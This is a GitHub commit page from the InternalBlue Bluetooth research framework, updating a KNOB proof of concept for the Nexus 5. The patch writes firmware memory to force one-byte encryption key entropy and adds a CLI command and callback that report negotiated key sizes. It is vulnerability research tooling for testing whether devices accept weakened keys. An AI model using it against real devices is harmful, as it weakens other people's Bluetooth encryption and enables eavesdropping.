Skip to content
Permalink
Browse files

new nexus5 knob poc with automatic callback

  • Loading branch information
jiska2342 committed Sep 28, 2019
1 parent 6d3eb20 commit 9d9b98ce71ae2337810703ace04f62d3a5732599
Showing with 70 additions and 9 deletions.
  1. +59 −7 examples/nexus5/KNOB_PoC.py
  2. +10 −2 internalblue/cmds.py
  3. +1 −0 requirements.txt
@@ -5,6 +5,10 @@

from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int



@@ -19,8 +23,8 @@
"""


internalblue = ADBCore(serial=False)
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device

# setup sockets
if not internalblue.connect():
@@ -38,11 +42,59 @@
internalblue.writeMem(0x203797, '\x01') # global key entropy


internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, you can open the regular InternalBlue cli with diagnostic mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n")
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0c\n"
"...shows the key size of handle 0x000c.\n")


class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."

parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)

parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")

def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True


def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return

if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))

return


# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)


# enter CLI
cli.commandLoop(internalblue)
@@ -1622,10 +1622,18 @@ class CmdSendDiagCmd(Cmd):
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--type", type=auto_int, default=0x07,
help="Type. Default is 0x07, but you can use 0x02 for ACL and 0x03 for SCO."
"Other values might crash.")
parser.add_argument("data", nargs="*",
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), Get Memory Dump (f3), Packet Test (f6).")
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). "
"Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), "
"Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), "
"Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), "
"Get Memory Dump (f3), Packet Test (f6).")

def work(self):

args = self.getArgs()
if not args or not args.data:
return True
@@ -1637,7 +1645,7 @@ def work(self):
else:
data += data_part.decode('hex')

self.internalblue.sendH4(0x07, data)
self.internalblue.sendH4(args.type, data)

return True

@@ -1 +1,2 @@
pwntools==3.12.2
pyelftools==0.24

0 comments on commit 9d9b98c

Please sign in to comment.
You can’t perform that action at this time.